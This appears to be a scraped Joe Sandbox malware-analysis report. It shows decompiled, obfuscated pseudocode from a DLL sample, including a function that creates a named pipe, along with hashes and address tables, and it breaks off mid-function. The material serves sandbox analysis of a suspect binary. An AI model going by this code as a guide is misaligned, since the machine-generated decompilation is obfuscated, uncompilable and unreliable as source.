                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID:
                                • String ID: X Z
                                • API String ID: 0-2211723858
                                • Opcode ID: 827fdf0af26fc57b60e32c1447e2fb47698a2641ae8370e9671a321f5b191396
                                • Instruction ID: d248b34bfa69909ae8380e5e03fecf0cecbf1d369ffee55f868a6fa9b7f6e9fb
                                • Opcode Fuzzy Hash: 827fdf0af26fc57b60e32c1447e2fb47698a2641ae8370e9671a321f5b191396
                                • Instruction Fuzzy Hash: D152F632608AA986E724CF16F8907B97BB0F758759F254136EA8DA3754DF3CE120CB14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130FED60 Relevance: 1.7, APIs: 1, Instructions: 209pipeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 50%
                                			E00007FFC7FFC130FED60(void* __ecx, signed int __edx, void* __esp, void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r8, void* __r9, void* __r10, signed int _a8, signed int _a16, long long _a24, signed int _a32, intOrPtr _a48, signed int _a56, signed int _a72, signed int* _a96, signed int _a104) {
				long long _v72;
				signed int _v80;
				signed int _v88;
				signed int _v96;
				long long _v104;
				void* __rdi;
				void* __rsi;
				signed int _t121;
				void* _t125;
				signed int _t129;
				void* _t158;
				signed int _t160;
				signed long long _t182;
				signed int* _t191;
				signed long long _t197;
				signed long long _t198;
				signed int _t206;
				signed int _t209;
				void* _t212;
				signed long long _t214;
				signed long long _t221;
				signed long long _t223;
				void* _t225;
				void* _t227;
				void* _t230;
				void* _t231;
				void* _t232;

				_t227 = __r10;
				_a32 = r9d;
				r9d = _a104;
				r14d = __r8 - 0x216;
				r8d = _a56;
				r15d = __rdx - 0x25a;
				_a8 = __rdx - 0x228c;
				r10d = __r9 - 0x2f8;
				r8d = r8d + 0xde3;
				_a32 = r10d;
				_t158 = _a48 + 0xffffc81f;
				_a72 = r8d;
				r13d = __edx;
				r12d = __rax - 0x8d0;
				_t160 = __rax - 0x278;
				_a16 = r12d;
				if (_t158 == _t232 + 0x21a) goto 0x130ff139;
				_a24 = __rbx;
				_t191 = _a96;
				if (_t158 - __r9 - 0x4c0 >= 0) goto 0x130feef0;
				if (r15d == _t212 - 0xfa) goto 0x130feef0;
				r8d =  *(_t191[0x34] + 0x54);
				E00007FFC7FFC130EBFF0(__ecx, __rcx - 0x108, _t158, __esp, _t191[0x30], _t191[0x22], _t212, _t214, __r8);
				r9d = _t191[0x2e];
				r9d = r9d - 0x13eb;
				_t125 =  *((intOrPtr*)(_t191[0x72] + 0xb8)) - 0x13eb;
				if (_t125 - __r9 > 0) goto 0x130feea1;
				_t221 = _t191[0x78] ^ 0x0000329d;
				asm("o16 nop [eax+eax]");
				if (_t125 + 1 - __r9 <= 0) goto 0x130fee90;
				_t191[8] = _t191[8] + _t221;
				_t182 = _t191[0x68];
				_t206 = _t191[0x10];
				r8d = _a72;
				r10d = _a32;
				_t197 =  *(_t182 + 0x150) ^  *(_t206 + 0x198) ^ 0x00003666;
				 *(_t206 + 0x198) = _t197;
				_t191[0x12] = _t182 * 0x1f2c;
				if (r8d - _t230 + 0x55e >= 0) goto 0x130feff2;
				if (0 - _t191[0x3e] >= 0) goto 0x130ff131;
				asm("o16 nop [eax+eax]");
				_t223 =  *_t191;
				r8d = 0x3595;
				if (( *(_t223 + 0x130) ^ 0x00001662) == r8d) goto 0x130fef68;
				r8d = r8d + 1;
				_t191[0x78] = _t191[0x78] - 0x469b;
				_t198 = _t197 ^ 0x00001662;
				if (r8d != _t198) goto 0x130fef41;
				r9d = _t191[0x4c] * 0x550e2718;
				_t191[0x78] = _t191[0x78] * 0x3882;
				_t209 = _t191[0x42];
				_t225 = _t223 * _t214 + _t209;
				if (( !(_t198 - 1) &  *((intOrPtr*)(_t209 + 0x10)) - 0x00000001 +  *((intOrPtr*)(_t191[0x34] + 0x3c))) == 0) goto 0x130fefd9;
				if ( *((intOrPtr*)(_t225 + 0x14)) == 0) goto 0x130fefd9;
				_t129 =  *(_t225 + 0x10);
				if (_t129 == 0) goto 0x130fefd9;
				r8d = _t129;
				E00007FFC7FFC130EBFF0( *((intOrPtr*)(_t225 + 0xc)), 0, 0, __esp, _t198 + _t191[0x30], _t209 + _t191[0x22], _t212, _t214, _t221);
				if (1 - (_t191[0x3e] & 0x0000ffff) < 0) goto 0x130fef20;
				goto 0x130ff131;
				if (_t191[0x70] - 1 >= 0) goto 0x130ff131;
				r13d = _a8;
				_v72 = _t231 + 0x4ac1 + _t160;
				r12d = 0;
				_a72 = (_t160 | r13d) + 0xffffdfce;
				r12d = r12d & r14d;
				r14d = _a72;
				r15d = r15d & _t160;
				_a104 = _t227 - 0x2103;
				r9d = _t191[0x54];
				r8d = _t191[0x4c];
				r8d = r8d & _t160;
				_v96 = r13d - _t191[0x50];
				r9d = r9d * _t160;
				_v104 = (_t221 + 0x3a59) * r10d;
				CreateNamedPipeA(??, ??, ??, ??, ??, ??, ??, ??);
				r8d =  *_t191;
				r8d = r8d & _t191[0x6c];
				_v80 = r12d;
				_t191[0x2c] = _t191[0x2c] + _t191[0x70] - _t160 + _t191[0x8c];
				_v88 = _t191[0x16] | 0x0000228c;
				_v96 = r15d;
				_v104 = _t191[0x48] + 0xffffc919 + r13d;
				_t121 = E00007FFC7FFC130E8BF0(_a104, r8d & _t191[0x78] ^ 0x0000228c, _t191[0x70] - _t160 + _t191[0x8c], _t191, _t160, _t231 + 0x4ac1 + _t160, _t221, _t191, _t231 + 0x4ac1 + _t160);
				r10d = _a32;
				r8d = _t121;
				if (_t212 - 1 != 0) goto 0x130ff060;
				r12d = _a16;
				return _t230 - 0x1086;
			}






























                                0x7ffc130fed60
                                0x7ffc130fed60
                                0x7ffc130fed74
                                0x7ffc130fed7c
                                0x7ffc130fed83
                                0x7ffc130fed98
                                0x7ffc130fed9f
                                0x7ffc130fedb3
                                0x7ffc130fedba
                                0x7ffc130fedc1
                                0x7ffc130fedc9
                                0x7ffc130fedcf
                                0x7ffc130fedd7
                                0x7ffc130fedda
                                0x7ffc130fede1
                                0x7ffc130fede7
                                0x7ffc130fedf8
                                0x7ffc130fee05
                                0x7ffc130fee0d
                                0x7ffc130fee17
                                0x7ffc130fee26
                                0x7ffc130fee41
                                0x7ffc130fee45
                                0x7ffc130fee51
                                0x7ffc130fee58
                                0x7ffc130fee65
                                0x7ffc130fee71
                                0x7ffc130fee7e
                                0x7ffc130fee85
                                0x7ffc130fee9b
                                0x7ffc130fee9d
                                0x7ffc130feea1
                                0x7ffc130feea8
                                0x7ffc130feeac
                                0x7ffc130feeb4
                                0x7ffc130feeca
                                0x7ffc130feed1
                                0x7ffc130feeec
                                0x7ffc130feefb
                                0x7ffc130fef0a
                                0x7ffc130fef16
                                0x7ffc130fef20
                                0x7ffc130fef23
                                0x7ffc130fef38
                                0x7ffc130fef48
                                0x7ffc130fef4b
                                0x7ffc130fef59
                                0x7ffc130fef66
                                0x7ffc130fef73
                                0x7ffc130fef7e
                                0x7ffc130fef8c
                                0x7ffc130fef9a
                                0x7ffc130fefab
                                0x7ffc130fefb3
                                0x7ffc130fefb5
                                0x7ffc130fefbb
                                0x7ffc130fefbd
                                0x7ffc130fefd4
                                0x7ffc130fefe7
                                0x7ffc130fefed
                                0x7ffc130ff000
                                0x7ffc130ff00f
                                0x7ffc130ff026
                                0x7ffc130ff030
                                0x7ffc130ff033
                                0x7ffc130ff03a
                                0x7ffc130ff03d
                                0x7ffc130ff04c
                                0x7ffc130ff04f
                                0x7ffc130ff060
                                0x7ffc130ff06e
                                0x7ffc130ff07e
                                0x7ffc130ff081
                                0x7ffc130ff08c
                                0x7ffc130ff093
                                0x7ffc130ff09b
                                0x7ffc130ff0a1
                                0x7ffc130ff0b7
                                0x7ffc130ff0ca
                                0x7ffc130ff0d6
                                0x7ffc130ff0f3
                                0x7ffc130ff0fa
                                0x7ffc130ff0ff
                                0x7ffc130ff10a
                                0x7ffc130ff10f
                                0x7ffc130ff117
                                0x7ffc130ff123
                                0x7ffc130ff129
                                0x7ffc130ff150

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: CreateNamedPipe
                                • String ID:
                                • API String ID: 2489174969-0
                                • Opcode ID: 676958c7396e2aded2e374393f5bc208b79977bc6edc0e319e61f5911db9d7ab
                                • Instruction ID: 6f7268671bd391bddf865556f143422abb8c40bfad2caa363f12c4782ec1b758
                                • Opcode Fuzzy Hash: 676958c7396e2aded2e374393f5bc208b79977bc6edc0e319e61f5911db9d7ab
                                • Instruction Fuzzy Hash: 3BA19A33608A958AD760CF29E844BED77A5F788B88F04413ACE4D5BB48DB38E955CB10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F1E14 Relevance: 1.7, APIs: 1, Instructions: 194COMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 87%
                                			E00007FFC7FFC130F1E14(signed int __ecx, long long __rbx, signed char* __rdx, long long __rsi, char* __r9) {
				signed int _t47;
				signed int _t51;
				signed char _t52;
				void* _t53;
				void* _t59;
				void* _t62;
				void* _t81;
				signed int _t87;
				signed int _t88;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t127;
				intOrPtr* _t135;
				void* _t140;
				char* _t149;
				long long _t151;
				void* _t154;
				void* _t155;
				void* _t157;
				void* _t161;
				void* _t165;

				_t137 = __rbx;
				_t161 = _t154;
				 *((long long*)(_t161 + 0x10)) = __rbx;
				 *((long long*)(_t161 + 0x18)) = _t151;
				 *((long long*)(_t161 + 0x20)) = __rsi;
				_push(_t165);
				_t155 = _t154 - 0x30;
				 *__r9 = 0;
				r10d = r10d & 0x0000003f;
				_t149 = __r9;
				_t87 = r8d;
				_t135 =  *((intOrPtr*)(0x13124970 + (__ecx >> 6) * 8));
				if (( *(_t135 + (__ecx << 6) + 0x38) & 0x00000080) == 0) goto 0x130f2076;
				r15d = 0x74000;
				if ((r15d & r8d) != 0) goto 0x130f1e93;
				_t140 = _t161 + 8;
				 *(_t155 + 0x50) = 0;
				_t99 = E00007FFC7FFC130F4DDC(_t81, _t135, _t140);
				if (_t99 != 0) goto 0x130f2091;
				if (_t99 != 0) goto 0x130f1ece;
				asm("bts edi, 0xe");
				r15d = 2;
				if ((_t87 & r15d) == 0x4000) goto 0x130f1ee4;
				_t15 = _t140 - 0x10000; // 0x64000
				if ((0xffffbfff & _t15) == 0) goto 0x130f1ed2;
				_t18 = _t140 - 0x20000; // 0x54000
				if ((0xffffbfff & _t18) == 0) goto 0x130f1edf;
				_t21 = _t140 - 0x40000; // 0x34000
				_t47 = _t21;
				if ((0xffffbfff & _t47) != 0) goto 0x130f1ee6;
				 *__r9 = 1;
				goto 0x130f1ee6;
				_t88 = _t87 | _t47;
				goto 0x130f1e93;
				if ((_t88 & 0x00000301) != 0x301) goto 0x130f1ee6;
				 *((intOrPtr*)(__r9)) = r15b;
				goto 0x130f1ee6;
				 *__r9 = 0;
				if ((_t88 & 0x00070000) == 0) goto 0x130f2076;
				if (( *__rdx & 0x00000040) != 0) goto 0x130f2076;
				_t51 = __rdx[4] & 0xc0000000;
				if (_t51 == 0x40000000) goto 0x130f1f20;
				if (_t51 == 0x80000000) goto 0x130f1f4b;
				if (_t51 != 0xc0000000) goto 0x130f2076;
				_t52 = __rdx[8];
				if (_t52 == 0) goto 0x130f2076;
				if (_t52 - r15d <= 0) goto 0x130f1f3e;
				if (_t52 - 4 <= 0) goto 0x130f1f91;
				if (_t52 != 5) goto 0x130f2076;
				if (0 == 0) goto 0x130f2019;
				r8d = 3;
				 *(_t155 + 0x50) = 0;
				_t53 = E00007FFC7FFC130F5864(0, r14d, 0xc0000000, _t96, _t135, __rbx, _t155 + 0x50, _t157);
				if (_t53 <= 0) goto 0x130f1f6c;
				_t91 =  ==  ? 0 : 1;
				if (_t53 == 0xffffffff) goto 0x130f1fb6;
				if (_t53 == r15d) goto 0x130f1fcd;
				if (_t53 != 3) goto 0x130f2006;
				if ( *(_t155 + 0x50) != 0xbfbbef) goto 0x130f1fcd;
				 *_t149 = 1;
				goto 0x130f2019;
				r8d = r15d;
				E00007FFC7FFC130F5D68(_t135, _t140, _t155 + 0x50);
				if (_t135 == 0) goto 0x130f201d;
				r8d = 0;
				E00007FFC7FFC130F5D68(_t135, _t140, _t155 + 0x50);
				if (_t135 != 0xffffffff) goto 0x130f1fc2;
				E00007FFC7FFC130EE6A0(_t135);
				goto 0x130f2078;
				goto 0x130f1f43;
				if (( *(_t155 + 0x50) & 0x0000ffff) != 0xfffe) goto 0x130f1fe6;
				_t59 = E00007FFC7FFC130EE6A0(_t135);
				 *_t135 = 0x16;
				goto 0x130f1fb6;
				if (_t59 != 0xfeff) goto 0x130f2006;
				r8d = 0;
				E00007FFC7FFC130F5D68(_t135, _t140, _t165);
				if (_t135 == 0xffffffff) goto 0x130f1fb6;
				 *_t149 = r15b;
				goto 0x130f2019;
				r8d = 0;
				E00007FFC7FFC130F5D68(_t135, _t140, _t165);
				if (_t135 == 0xffffffff) goto 0x130f1fb6;
				_t127 =  ==  ? 0 : 1;
				if (_t127 == 0) goto 0x130f2076;
				 *(_t155 + 0x50) = 0;
				if (_t127 == 0) goto 0x130f203d;
				if ( *_t149 - 1 != 1) goto 0x130f204a;
				 *(_t155 + 0x50) = 0xfeff;
				goto 0x130f204e;
				 *(_t155 + 0x50) = 0xbfbbef;
				if (3 <= 0) goto 0x130f2076;
				r8d = 3;
				r8d = r8d;
				_t62 = E00007FFC7FFC130F4A0C(0, r14d, 0, 3, _t95, 0, _t137, _t155 + 0x50, _t149);
				if (_t62 == 0xffffffff) goto 0x130f1fb6;
				if (3 - 0 + _t62 > 0) goto 0x130f204e;
				return 0;
			}

























                                0x7ffc130f1e14
                                0x7ffc130f1e14
                                0x7ffc130f1e17
                                0x7ffc130f1e1b
                                0x7ffc130f1e1f
                                0x7ffc130f1e26
                                0x7ffc130f1e28
                                0x7ffc130f1e34
                                0x7ffc130f1e37
                                0x7ffc130f1e4d
                                0x7ffc130f1e50
                                0x7ffc130f1e56
                                0x7ffc130f1e60
                                0x7ffc130f1e66
                                0x7ffc130f1e6f
                                0x7ffc130f1e71
                                0x7ffc130f1e75
                                0x7ffc130f1e7e
                                0x7ffc130f1e80
                                0x7ffc130f1e8d
                                0x7ffc130f1e8f
                                0x7ffc130f1e98
                                0x7ffc130f1ea4
                                0x7ffc130f1ea6
                                0x7ffc130f1eb3
                                0x7ffc130f1eb5
                                0x7ffc130f1ebd
                                0x7ffc130f1ebf
                                0x7ffc130f1ebf
                                0x7ffc130f1ec7
                                0x7ffc130f1ec9
                                0x7ffc130f1ecc
                                0x7ffc130f1ece
                                0x7ffc130f1ed0
                                0x7ffc130f1edd
                                0x7ffc130f1edf
                                0x7ffc130f1ee2
                                0x7ffc130f1ee4
                                0x7ffc130f1eec
                                0x7ffc130f1ef6
                                0x7ffc130f1f04
                                0x7ffc130f1f0f
                                0x7ffc130f1f16
                                0x7ffc130f1f1a
                                0x7ffc130f1f20
                                0x7ffc130f1f25
                                0x7ffc130f1f2e
                                0x7ffc130f1f33
                                0x7ffc130f1f38
                                0x7ffc130f1f45
                                0x7ffc130f1f4b
                                0x7ffc130f1f51
                                0x7ffc130f1f5d
                                0x7ffc130f1f64
                                0x7ffc130f1f69
                                0x7ffc130f1f6f
                                0x7ffc130f1f74
                                0x7ffc130f1f79
                                0x7ffc130f1f87
                                0x7ffc130f1f89
                                0x7ffc130f1f8c
                                0x7ffc130f1f91
                                0x7ffc130f1f99
                                0x7ffc130f1fa1
                                0x7ffc130f1fa3
                                0x7ffc130f1fab
                                0x7ffc130f1fb4
                                0x7ffc130f1fb6
                                0x7ffc130f1fbd
                                0x7ffc130f1fc8
                                0x7ffc130f1fd7
                                0x7ffc130f1fd9
                                0x7ffc130f1fde
                                0x7ffc130f1fe4
                                0x7ffc130f1feb
                                0x7ffc130f1fed
                                0x7ffc130f1ff6
                                0x7ffc130f1fff
                                0x7ffc130f2001
                                0x7ffc130f2004
                                0x7ffc130f2006
                                0x7ffc130f200e
                                0x7ffc130f2017
                                0x7ffc130f2019
                                0x7ffc130f201b
                                0x7ffc130f2022
                                0x7ffc130f2029
                                0x7ffc130f202e
                                0x7ffc130f2030
                                0x7ffc130f203b
                                0x7ffc130f203d
                                0x7ffc130f204c
                                0x7ffc130f204e
                                0x7ffc130f2059
                                0x7ffc130f2062
                                0x7ffc130f206a
                                0x7ffc130f2074
                                0x7ffc130f2090

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: _get_daylight_invalid_parameter_noinfo
                                • String ID:
                                • API String ID: 474895018-0
                                • Opcode ID: be638d611d0ffe0b5027be264a8367b695c78b4831f7ebfcc585b6cae8fb1a0e
                                • Instruction ID: 4b015c7c32101a0cbddf5a22a90db8bd5acd295058e13ea61ab62ed8d8ac4537
                                • Opcode Fuzzy Hash: be638d611d0ffe0b5027be264a8367b695c78b4831f7ebfcc585b6cae8fb1a0e
                                • Instruction Fuzzy Hash: 18712922F0CA6A43F73889299E4033962C9AF4137CF144674DA5DA76D2DF3DE861C720
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130E83C0 Relevance: 1.7, Strings: 1, Instructions: 408COMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 23%
                                			E00007FFC7FFC130E83C0(signed int __ebx, void* __edi, signed int __rax, signed int __rcx, long long __rdx, signed int __rsi, long long __rbp, signed long long __r8, signed int __r10, long long __r12, signed int _a8, signed int _a16, signed int _a24, unsigned long long _a32) {
				long long _v48;
				long long _v56;
				long long _v64;
				long long _v88;
				signed long long _v96;
				signed long long _v104;
				long long _v112;
				signed char* _v120;
				signed long long* _v128;
				signed int _v136;
				char _v144;
				signed long long _v152;
				signed int _v160;
				long long _v168;
				long long _v176;
				long long _v184;
				signed long long _v192;
				signed long long _v200;
				signed int _t273;
				void* _t285;
				signed int _t286;
				signed int _t287;
				long long _t299;
				intOrPtr _t306;
				intOrPtr _t307;
				signed short _t319;
				signed char _t326;
				signed long long _t351;
				intOrPtr _t404;
				intOrPtr _t405;
				long long _t406;
				intOrPtr _t407;
				signed long long _t409;
				intOrPtr _t414;
				signed long long _t416;
				intOrPtr _t418;
				signed long long _t419;
				signed long long _t420;
				signed long long _t421;
				signed int _t423;
				signed long long _t426;
				signed long long _t427;
				long long _t431;
				intOrPtr _t433;
				signed long long _t434;
				signed long long _t435;
				signed long long _t437;
				signed long long _t438;
				intOrPtr _t445;
				signed long long _t447;
				signed long long _t448;
				signed long long _t449;
				signed long long _t455;
				long long _t460;
				long long _t461;
				signed long long _t463;
				intOrPtr _t467;
				signed long long _t472;
				signed long long _t479;
				signed int _t480;
				signed long long _t485;
				signed long long _t487;
				unsigned long long _t490;
				signed long long _t491;
				unsigned long long _t495;
				long long _t497;
				signed long long _t507;
				signed long long _t517;
				long long _t525;
				signed long long _t526;
				signed long long _t529;
				signed long long _t533;
				long long _t549;
				long long _t550;
				signed long long _t552;
				signed long long _t554;
				long long _t555;

				_t512 = __r8;
				_t326 = __ebx;
				_t447 = __rcx + 1;
				_v136 = _t447;
				_v96 = __rax ^ 0x00001b22;
				_t404 =  *0x13124138; // 0x0
				_t555 = __rdx;
				_v112 = 0x1a42;
				r13b = 0xa0;
				_t497 =  *((intOrPtr*)(_t404 + (__rcx + __rcx * 2) * 8));
				 *0x13124148 =  *0x13124148 - 1;
				_t405 =  *0x131241a8; // 0x0
				_v88 = _t497;
				r10d =  *(_t405 + 0xabb) & 0x000000ff;
				_t406 =  *((intOrPtr*)(__rdx + 0x500));
				_t533 = __r10 | _t447;
				 *((long long*)(__rdx + 0x110 + (_t447 + _t447 * 2) * 8)) = _t406;
				_t448 = _t447 + 1;
				_v104 = _t533;
				_t455 = _t448 + _t448;
				 *((long long*)(__rdx + 0x500)) = _t406;
				_t407 =  *0x13124140; // 0x0
				 *((intOrPtr*)(_t407 + _t455 * 8)) =  *((intOrPtr*)(_t407 + _t455 * 8)) + 0x1065;
				_t409 =  *0x13124158; // 0x0
				r14d =  *0x131241a0; // 0x0
				 *0x13124170 = __rdx;
				if (r14d != ( *(_t409 + _t447) & 0x000000ff)) goto 0x130e8b61;
				_v48 = __rbp;
				_v56 = __rsi;
				_t351 = _t554 + _t554;
				_a8 = _t554 + _t554 * 2;
				_t44 = _t554 + 0xf; // 0xf
				r8d = _t44;
				_v64 = __r12;
				_t47 = _t555 + 0x100; // 0x1d2
				_a24 = _t554 * 4;
				_a32 = _t351;
				_a16 = r8d;
				asm("o16 nop [eax+eax]");
				_t273 = r14d -  *0x13124194;
				_t525 = _t47 + _t448 * 8 + 8;
				 *0x13124194 = _t273;
				_t507 = _t351;
				_t552 = r14d;
				_v120 = _t525;
				r9d =  *0x13124130 & 0x0000ffff;
				_v128 = _t533 + _t448 * 8 + 0xc0;
				 *0x1312416c = _t273 / _t455;
				_t63 = _t512 + 0x61d; // 0x62c
				r8d = r13b & 0xffffffff;
				_t449 = _t448 + 1;
				_t71 = _t554 - 0x7e; // -126
				_v144 = _t71;
				_v152 = 0xc74;
				_v160 = _t63;
				_v168 = _t525;
				_t526 = _t552;
				_v176 = ( *(_v136 + _t449 * 2) & 0x000000ff) + r14d;
				_v184 = 0x8c;
				_v192 = __r8;
				_v200 = _t449;
				 *((intOrPtr*)(_t497 + 0xab3 + _t449 * 4)) = E00007FFC7FFC130E5CC0(__ebx & 0x000000ff, __edi, _v136, __rdx, _t449, _t526);
				 *0x13124130 =  *0x13124130 + 0x90e;
				_t485 =  *0x13124198; // 0x0
				r8d =  *0x13124194; // 0x0
				 *0x13124198 = _t485 | _t485 ^ 0x00001f9f;
				_t460 =  *0x13124170; // 0x0
				_t461 = _t460 + 1;
				_t414 =  *0x13124160; // 0x0
				 *0x13124170 = _t461;
				r9d =  *(_t414 + _t507) & 0x000000ff;
				_v144 = ( *(_t555 + _a8 * 8) & 0x000000ff) + r8b;
				_v152 = 0x1561;
				_v160 = r14d | 0x00001797;
				_v168 = _t526 - _t461;
				r9d = 0x14c7;
				_v176 = 0x4de - r8d;
				_v184 = 0x184d;
				_v192 =  *0x13124134 &  *0x13124158;
				_v200 = 0x7b217;
				_t285 = E00007FFC7FFC130E5CC0(0x28, __edi, _a8, __rsi | 0x00001a94, _t485 | _t485 ^ 0x00001f9f, _t526 - _t461);
				 *0x13124134 =  *0x13124134 * 0xde0;
				if ( *0x13124170 - 0x1518 < 0) goto 0x130e8a08;
				if (( *0x13124190 & 0x0000ffff) -  *((intOrPtr*)(0x1658 + _t449 * 4)) > 0) goto 0x130e8a08;
				if (_t285 - 0x1827 <= 0) goto 0x130e8919;
				_t416 =  *0x131241a0; // 0x0
				_t463 = _v104;
				if ( *((long long*)(_t463 + _t416 * 8)) - 0x8c8 > 0) goto 0x130e8919;
				_t487 = _a16;
				if ( *((intOrPtr*)(_t555 + _t487 * 8)) - _t463 < 0) goto 0x130e8878;
				_t418 =  *0x13124140; // 0x0
				if ( *((intOrPtr*)(_t418 + _t507 * 4)) - r14d < 0) goto 0x130e8878;
				_t286 =  *0x1312414c; // 0x0
				_t287 = _t286 + 1;
				 *0x1312414c = _t287;
				r10d = r10d & 0x00001d8d;
				_t419 = _t552;
				 *(_t555 + (_t287 + _t287) * 8) = _t419;
				_t549 =  *0x13124170; // 0x0
				 *0x13124120 =  *0x13124120 ^ (r14w & 0xffffffff) + (r14w & 0xffffffff);
				_t550 = _t549 +  *((intOrPtr*)(_t555 + _t419 * 8));
				 *0x1312416c = ( *0x1312416c & 0x0000ffff) + 1;
				_t420 =  *0x13124140; // 0x0
				_v184 =  *(_t555 + _t449 * 8) & 0x000000ff;
				_v192 = _t552;
				_v200 = 0x4a4;
				_t299 = E00007FFC7FFC13100D70(( *(_t420 + (_t287 + _t287) * 4) & 0x000000ff) + r14b, _t420, _t550, _t552 | 0x00001d0f,  *((intOrPtr*)(_t555 + _t420 * 8)), _t550);
				_t517 = _a8;
				 *((long long*)(_t555 + _t420 * 8)) = _t299;
				_t421 =  *0x131241a8; // 0x0
				 *_v128 = _t487;
				if ((r13b & 0xffffffff) == r14d) goto 0x130e8859;
				if ((_t421 ^ _t552) -  *((intOrPtr*)(_t555 + _t517 * 8)) < 0) goto 0x130e8859;
				_t423 =  *0x131241a0; // 0x0
				_t467 =  *0x131241a8; // 0x0
				if ( *((intOrPtr*)(_v136 + _t507)) != ( *(_t423 + _t467) & 0x000000ff)) goto 0x130e8ae9;
				 *0x1312416c = ( *0x1312416c & 0x0000ffff) * (r14w & 0xffffffff);
				goto 0x130e8aec;
				_t306 =  *0x13124148; // 0x0
				r9d = 0xf5c;
				 *0x1312414c =  *0x1312414c ^ 0x01d2c800;
				_t307 = _t306 + 1;
				 *0x13124148 = _t307;
				r8d = 0x1567;
				_v184 = 0xf3;
				_v192 = 0xb23;
				 *((intOrPtr*)(_t307 +  *0x131241a8)) =  *((intOrPtr*)(_t307 +  *0x131241a8)) + ( *_v120 & 0x000000ff |  *0x13124120 | 0x0000001a);
				_t426 =  *0x13124150; // 0x0
				 *0x13124133 = 0x28;
				_v200 = _t426;
				 *0x13124124 = E00007FFC7FFC13100D70(( *0x13124133 & 0x000000ff) + 0x00000080 &  *0x13124123, _t426,  *(_t555 + _t552 * 8) + 0x105b, _t517,  *((intOrPtr*)(_t555 + _t420 * 8)), _t550);
				 *((long long*)(0x1786 + _t449 * 8)) = 0x95e;
				goto 0x130e8aec;
				_t490 =  *0x13124124;
				r13b = r13b + 1;
				_t427 =  *0x13124128; // 0x0
				_t472 = _t427 + _t490 * 4;
				 *_t472 =  *_t472 ^  *(_t555 + _t490 * 8);
				 *0x13124124 =  *0x13124124 - 1;
				 *0x13124158 = _t552;
				 *(0x7e1 + _t472 * 8) =  *(0x7e1 + _t472 * 8) & (_t427 ^ 0x00000a78);
				_t529 =  *0x13124170; // 0x0
				r8d =  *0x13124132 & 0x000000ff;
				 *0x13124170 = _t529 - 1;
				_t491 = _t490 >> 0xb;
				 *0x1312416c = ( *0x13124120 & 0x0000ffff) * (_t517 & _t529 | _t552) / _t491 * 0x1639;
				_t431 =  *0x13124138; // 0x0
				 *((long long*)(_t431 + _t552 * 8)) = _t431;
				_t433 =  *0x13124138; // 0x0
				 *0x13124180 = _t491 *  *(_t433 + 0xa760) * _t449 ^ 0x00000510;
				goto 0x130e8aec;
				_t434 =  *0x131241a0; // 0x0
				r9d =  *(_t555 + _t552 * 8);
				r9d = r9d + _t326;
				_t435 = _v112;
				r8d =  *0x13124132 & 0x000000ff;
				_v128 = _v128 - 8;
				_v120 = _v120 - 8;
				_v144 = 0x64;
				_v152 = _t552;
				_v160 = r9d;
				r9d = 0x775;
				_v168 =  *0x13124124;
				_v112 = _t435 - 1;
				_t437 = _v96;
				r11d =  *(_t437 + _t552 * 2) & 0x0000ffff;
				_v176 = _t550;
				_v184 =  *0x5139;
				_v192 = _t435 ^ 0x00000eae;
				_v200 =  *(_t555 + _t434 * 8) ^ 0x000019a2;
				_t319 = E00007FFC7FFC130E5CC0(_t326 & 0x000000ff, r13b & 0xffffffff, _t437, _v136 &  *0x13124180, (_t517 & _t529 | _t552) - _t491 * 0x1639, _t529 - 1);
				_t495 = _a32;
				 *0x13124120 = _t319;
				 *((char*)(_t495 + _v136)) = 0xfb;
				r13b = r13b ^ 0x00000075;
				 *(_t555 + _a8 * 8) = _t495;
				goto 0x130e8aec;
				_t479 = _t437;
				r8d = _a16;
				r14d = r14d + 1;
				r8d = r8d + 1;
				_t438 =  *0x13124158; // 0x0
				_a24 = _a24 + 4;
				_a8 = _a8 + 3;
				_a16 = r8d;
				_a32 = _a32 + 2;
				if (r14d == ( *(_t438 + _t479) & 0x000000ff)) goto 0x130e8520;
